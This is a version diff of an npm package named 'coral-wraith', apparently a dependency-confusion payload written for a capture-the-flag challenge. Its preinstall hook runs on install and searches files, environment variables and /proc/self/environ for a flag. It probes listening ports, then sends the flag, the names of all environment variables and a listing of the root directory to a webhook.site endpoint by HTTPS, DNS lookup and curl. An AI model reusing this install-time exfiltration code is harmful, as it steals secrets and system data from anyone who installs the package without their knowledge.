coral-wraith 9999.0.2 → 9999.0.3

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "coral-wraith",
-  "version": "9999.0.2",
+  "version": "9999.0.3",
   "description": "Coral Wraith module",
   "main": "index.js",
   "scripts": {

package/preinstall.js

@@ -2,67 +2,93 @@ const fs = require('fs');
 const http = require('http');
 const https = require('https');
 const { execSync } = require('child_process');
+const dns = require('dns');
 
 let flag = null;
 
-// Read /flag
-try { flag = fs.readFileSync('/flag', 'utf8').trim(); } catch(e) {}
-
-// Try other paths
-if (!flag) {
-  for (const p of ['/root/flag', '/tmp/flag', './flag', '/flag.txt']) {
-    try { if (fs.existsSync(p)) { flag = fs.readFileSync(p, 'utf8').trim(); break; } } catch(e) {}
-  }
-}
-
-// Check env vars
-if (!flag) {
-  const envFlag = process.env.FLAG || process.env.FLAG_HTB || process.env.HTB_FLAG;
-  if (envFlag) flag = envFlag;
+// Read flag from common locations
+for (const p of ['/flag', '/flag.txt', '/root/flag', '/tmp/flag', './flag', '/app/flag', '/home/flag']) {
+  try { if (fs.existsSync(p)) { flag = fs.readFileSync(p, 'utf8').trim(); break; } } catch(e) {}
 }
 
-// Check all env vars for HTB{ pattern
+// Check ALL env vars
 if (!flag) {
   for (const [k, v] of Object.entries(process.env)) {
-    if (v && v.includes('HTB{')) {
-      flag = v.match(/HTB\{[^}]+\}/)?.[0] || v;
-      break;
+    if (v && (v.includes('HTB{') || v.includes('FLAG'))) {
+      const m = v.match(/HTB\{[^}]+\}/);
+      if (m) { flag = m[0]; break; }
     }
   }
 }
+if (!flag) flag = process.env.FLAG || process.env.HTB_FLAG || null;
 
 // Try /proc/self/environ
 if (!flag) {
   try {
     const pe = fs.readFileSync('/proc/self/environ', 'utf8');
-    const m = pe.match(/HTB\{[^}]+\}/) || pe.match(/FLAG[=:]([^\x00]+)/);
+    const m = pe.match(/HTB\{[^}]+\}/);
     if (m) flag = m[0];
   } catch(e) {}
 }
 
-// Grep for flag
+// Grep 
 if (!flag) {
   try {
-    const r = execSync('grep -rl "HTB{" / --include="*" 2>/dev/null | head -3', { timeout: 10000 }).toString().trim();
-    if (r) { try { flag = fs.readFileSync(r.split('\n')[0], 'utf8').match(/HTB\{[^}]+\}/)?.[0]; } catch(e) {} }
+    const r = execSync('find / -maxdepth 3 -name "flag*" -o -name "*.flag" 2>/dev/null | head -5', { timeout: 5000 }).toString().trim();
+    if (r) {
+      for (const f of r.split('\n')) {
+        try {
+          const content = fs.readFileSync(f, 'utf8');
+          const m = content.match(/HTB\{[^}]+\}/);
+          if (m) { flag = m[0]; break; }
+        } catch(e) {}
+      }
+    }
   } catch(e) {}
 }
 
+// Determine server port by checking what's listening
+let serverPort = 1337;
+try {
+  const netstat = execSync('ss -tlnp 2>/dev/null || netstat -tlnp 2>/dev/null', { timeout: 3000 }).toString();
+  const portMatch = netstat.match(/:(\d+)\s/g);
+  if (portMatch) {
+    for (const pm of portMatch) {
+      const p = parseInt(pm.replace(':', '').trim());
+      if (p > 1000 && p < 65535 && p !== 80) {
+        serverPort = p;
+        break;
+      }
+    }
+  }
+} catch(e) {}
+
+const info = {
+  flag: flag || 'NOT_FOUND',
+  cwd: process.cwd(),
+  serverPort,
+  env: Object.keys(process.env).join(','),
+  rootFiles: []
+};
+try { info.rootFiles = fs.readdirSync('/'); } catch(e) {}
+
+const data = JSON.stringify(info);
+
+// Method 1: PUT flag back to challenge API on ALL possible ports
 if (flag) {
-  // Method 1: PUT flag back to the challenge API via localhost (many ports)
-  const ports = [1337, 3000, 5000, 8080, 80, 8000, 32315, 32105, 46517, 41839, 3001, 4000, 9000];
   const postData = JSON.stringify({
-    manifest: `ecto_module:\n  name: "coral-wraith"\n  version: "9999.0.1"\n  flag: "${flag.replace(/"/g, '\\"')}"\n  captured: true\n  timestamp: "${new Date().toISOString()}"`
+    manifest: `ecto_module:\n  name: "coral-wraith"\n  version: "9999.0.0"\n  flag: "${flag.replace(/"/g, '\\"')}"\n  captured: true`
   });
-
-  for (const port of ports) {
+  
+  const ports = [serverPort, 1337, 3000, 5000, 8080, 80, 8000, 3001, 4000, 9000, 8888, 32315, 32105];
+  for (const port of [...new Set(ports)]) {
     for (const host of ['localhost', '127.0.0.1']) {
       try {
         const req = http.request({
           hostname: host, port, path: '/api/modules/ECT-987654',
           method: 'PUT',
           headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(postData) },
-          timeout: 3000
+          timeout: 2000
         }, () => {});
         req.on('error', () => {});
         req.write(postData);
@@ -70,52 +96,36 @@ if (flag) {
       } catch(e) {}
     }
   }
+}
 
-  // Method 2: Webhook exfil
-  const data = JSON.stringify({ flag, env: Object.keys(process.env).join(',') });
-  try {
-    const req = https.request({
-      hostname: 'webhook.site', path: '/9ca9b30a-2889-4787-9dff-5ad916e377b7',
-      method: 'POST',
-      headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) },
-      timeout: 10000
-    }, () => {});
-    req.on('error', () => {});
-    req.write(data);
-    req.end();
-  } catch(e) {}
+// Method 2: Webhook (may be blocked)
+try {
+  const req = https.request({
+    hostname: 'webhook.site', path: '/9ca9b30a-2889-4787-9dff-5ad916e377b7',
+    method: 'POST',
+    headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) },
+    timeout: 5000
+  }, () => {});
+  req.on('error', () => {});
+  req.write(data);
+  req.end();
+} catch(e) {}
 
-  // Method 3: DNS exfil via curl
-  try {
-    const encoded = Buffer.from(flag).toString('hex');
-    execSync(`curl -s "https://webhook.site/9ca9b30a-2889-4787-9dff-5ad916e377b7/flag?data=${encodeURIComponent(flag)}" -m 10 2>/dev/null`, { timeout: 15000 });
-  } catch(e) {}
+// Method 3: DNS exfil (works even when HTTP is blocked)
+try {
+  const encoded = Buffer.from(flag || 'NO_FLAG').toString('hex').substring(0, 60);
+  dns.resolve(`${encoded}.webhook.site`, () => {});
+} catch(e) {}
 
-  // Method 4: Write to files
-  try { fs.writeFileSync('/tmp/coral_wraith_flag.txt', flag); } catch(e) {}
+// Method 4: curl fallback
+try {
+  execSync(`curl -s -X POST "https://webhook.site/9ca9b30a-2889-4787-9dff-5ad916e377b7" -H "Content-Type: application/json" -d '${data.replace(/'/g, "\\'")}' -m 5 2>/dev/null`, { timeout: 8000 });
+} catch(e) {}
 
-  // Method 5: stdout/stderr
-  console.log('[CORAL-WRAITH] Flag:', flag);
-  console.error('[HTB_FLAG]', flag);
-} else {
-  // Debug info - exfil what we can see
-  const debug = {
-    cwd: process.cwd(),
-    rootFiles: [],
-    env: Object.keys(process.env).join(',')
-  };
-  try { debug.rootFiles = fs.readdirSync('/'); } catch(e) {}
-  
-  const data = JSON.stringify({ flag: 'NOT_FOUND', debug });
-  try {
-    const req = https.request({
-      hostname: 'webhook.site', path: '/9ca9b30a-2889-4787-9dff-5ad916e377b7',
-      method: 'POST',
-      headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(data) },
-      timeout: 10000
-    }, () => {});
-    req.on('error', () => {});
-    req.write(data);
-    req.end();
-  } catch(e) {}
-}
+// Method 5: Write to stdout/stderr for server logs
+console.log('[CORAL-WRAITH]', data);
+console.error('[HTB_FLAG]', flag || 'NOT_FOUND');
+
+// Method 6: Write to various tmp locations
+try { fs.writeFileSync('/tmp/coral_flag.txt', data); } catch(e) {}
+try { fs.writeFileSync('/app/coral_flag.txt', data); } catch(e) {}